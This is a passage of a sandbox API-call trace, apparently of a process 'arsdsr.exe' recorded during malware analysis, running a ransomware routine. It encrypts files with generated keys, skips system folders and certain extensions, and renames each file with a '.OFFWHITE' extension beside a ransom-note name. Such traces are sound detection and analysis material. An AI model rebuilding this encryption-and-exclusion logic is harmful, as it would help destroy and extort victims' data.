out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0146.005] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.005] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.005] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0146.006] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x87f60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.006] SetLastError (dwErrCode=0x0) [0146.006] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0146.008] GetLastError () returned 0x0 [0146.008] GetLastError () returned 0x0 [0146.008] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x88060, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.008] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0146.009] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x88160, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.009] WriteFile (in: hFile=0x218, lpBuffer=0x546e78*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546e78*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0146.009] GetProcessHeap () returned 0x500000 [0146.009] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x87f60) returned 0x2a60020 [0146.009] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.010] ReadFile (in: hFile=0x218, lpBuffer=0x2a60020, nNumberOfBytesToRead=0x87f60, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295d1c0*=0x87f60, lpOverlapped=0x0) returned 1 [0146.064] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.064] WriteFile (in: hFile=0x218, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0x87f60, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295d1cc*=0x87f60, lpOverlapped=0x0) returned 1 [0146.066] GetProcessHeap () returned 0x500000 [0146.066] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0146.070] CloseHandle (hObject=0x218) returned 1 [0146.070] GetProcessHeap () returned 0x500000 [0146.070] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0146.070] GetProcessHeap () returned 0x500000 [0146.073] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0146.073] GetProcessHeap () returned 0x500000 [0146.073] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0146.073] GetProcessHeap () returned 0x500000 [0146.073] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0146.073] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll" [0146.073] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll.OFFWHITE" [0146.073] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll.offwhite")) returned 1 [0146.074] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2720b500, ftCreationTime.dwHighDateTime=0x1cac80f, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x2720b500, ftLastWriteTime.dwHighDateTime=0x1cac80f, nFileSizeHigh=0x0, nFileSizeLow=0x57f60, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="PUBWZINT.REST.trx_dll", cAlternateFileName="PUBWZI~1.TRX")) returned 1 [0146.074] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2=".") returned 1 [0146.074] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="..") returned 1 [0146.075] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="...") returned 1 [0146.075] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="windows") returned -1 [0146.075] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="$recycle.bin") returned 1 [0146.075] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="rsa") returned -1 [0146.075] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0146.075] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="programdata") returned 1 [0146.075] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="appdata") returned 1 [0146.075] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="program files") returned 1 [0146.075] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="program files (x86)") returned 1 [0146.075] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0146.075] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="PUBWZINT.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll" [0146.075] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.075] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.075] PathFindExtensionW (pszPath="PUBWZINT.REST.trx_dll") returned=".trx_dll" [0146.075] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0146.075] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0146.075] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0146.075] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0146.075] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0146.075] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0146.075] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0146.075] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0146.075] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0146.075] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0146.075] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0146.075] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0146.076] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0146.076] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0146.076] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0146.076] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.076] GetProcessHeap () returned 0x500000 [0146.076] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546e88 [0146.076] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0146.076] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=360288) returned 1 [0146.076] GetProcessHeap () returned 0x500000 [0146.076] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0146.076] GetProcessHeap () returned 0x500000 [0146.076] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0146.076] GetProcessHeap () returned 0x500000 [0146.076] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0146.076] GetProcessHeap () returned 0x500000 [0146.077] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0146.077] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.077] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.077] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0146.077] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.077] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.077] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0146.077] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.077] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.077] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0146.077] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.077] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.077] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0146.078] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x57f60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.078] SetLastError (dwErrCode=0x0) [0146.078] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0146.081] GetLastError () returned 0x0 [0146.081] GetLastError () returned 0x0 [0146.081] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x58060, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.081] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0146.082] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x58160, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.082] WriteFile (in: hFile=0x218, lpBuffer=0x546e88*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546e88*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0146.082] GetProcessHeap () returned 0x500000 [0146.082] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x57f60) returned 0x2960048 [0146.082] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.082] ReadFile (in: hFile=0x218, lpBuffer=0x2960048, nNumberOfBytesToRead=0x57f60, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x2960048*, lpNumberOfBytesRead=0x295d1c0*=0x57f60, lpOverlapped=0x0) returned 1 [0146.107] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.107] WriteFile (in: hFile=0x218, lpBuffer=0x2960048*, nNumberOfBytesToWrite=0x57f60, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x2960048*, lpNumberOfBytesWritten=0x295d1cc*=0x57f60, lpOverlapped=0x0) returned 1 [0146.108] GetProcessHeap () returned 0x500000 [0146.108] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2960048 | out: hHeap=0x500000) returned 1 [0146.108] CloseHandle (hObject=0x218) returned 1 [0146.108] GetProcessHeap () returned 0x500000 [0146.108] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0146.108] GetProcessHeap () returned 0x500000 [0146.108] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0146.108] GetProcessHeap () returned 0x500000 [0146.108] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0146.108] GetProcessHeap () returned 0x500000 [0146.108] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0146.108] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll" [0146.108] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll.OFFWHITE" [0146.108] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll.offwhite")) returned 1 [0146.109] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x94d0df00, ftCreationTime.dwHighDateTime=0x1cac817, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x94d0df00, ftLastWriteTime.dwHighDateTime=0x1cac817, nFileSizeHigh=0x0, nFileSizeLow=0x3360, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="SGRES.DLL.trx_dll", cAlternateFileName="SGRESD~1.TRX")) returned 1 [0146.109] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2=".") returned 1 [0146.109] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="..") returned 1 [0146.109] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="...") returned 1 [0146.109] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="windows") returned -1 [0146.109] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0146.110] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="rsa") returned 1 [0146.110] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0146.110] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="programdata") returned 1 [0146.110] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="appdata") returned 1 [0146.110] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="program files") returned 1 [0146.110] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="program files (x86)") returned 1 [0146.110] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0146.110] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="SGRES.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll" [0146.110] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.110] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.110] PathFindExtensionW (pszPath="SGRES.DLL.trx_dll") returned=".trx_dll" [0146.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0146.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0146.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0146.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0146.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0146.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0146.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0146.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0146.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0146.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0146.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0146.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0146.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0146.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0146.110] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0146.110] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.110] GetProcessHeap () returned 0x500000 [0146.110] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546e98 [0146.111] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0146.111] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=13152) returned 1 [0146.111] GetProcessHeap () returned 0x500000 [0146.111] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0146.111] GetProcessHeap () returned 0x500000 [0146.111] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0146.111] GetProcessHeap () returned 0x500000 [0146.111] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0146.111] GetProcessHeap () returned 0x500000 [0146.111] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0146.111] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.111] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.111] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0146.111] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.111] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.111] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0146.112] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.112] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.112] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0146.112] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.112] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.112] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0146.112] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3360, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.112] SetLastError (dwErrCode=0x0) [0146.112] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0146.115] GetLastError () returned 0x0 [0146.115] GetLastError () returned 0x0 [0146.115] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3460, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.115] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0146.115] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.115] WriteFile (in: hFile=0x218, lpBuffer=0x546e98*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546e98*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0146.115] GetProcessHeap () returned 0x500000 [0146.115] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3360) returned 0x5607c8 [0146.115] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.115] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x3360, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x3360, lpOverlapped=0x0) returned 1 [0146.118] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.118] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x3360, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x3360, lpOverlapped=0x0) returned 1 [0146.118] GetProcessHeap () returned 0x500000 [0146.118] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0146.118] CloseHandle (hObject=0x218) returned 1 [0146.118] GetProcessHeap () returned 0x500000 [0146.119] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0146.119] GetProcessHeap () returned 0x500000 [0146.119] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0146.119] GetProcessHeap () returned 0x500000 [0146.119] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0146.119] GetProcessHeap () returned 0x500000 [0146.119] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0146.119] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll" [0146.119] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll.OFFWHITE" [0146.119] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll.offwhite")) returned 1 [0146.120] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca190500, ftCreationTime.dwHighDateTime=0x1cac7f6, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xca190500, 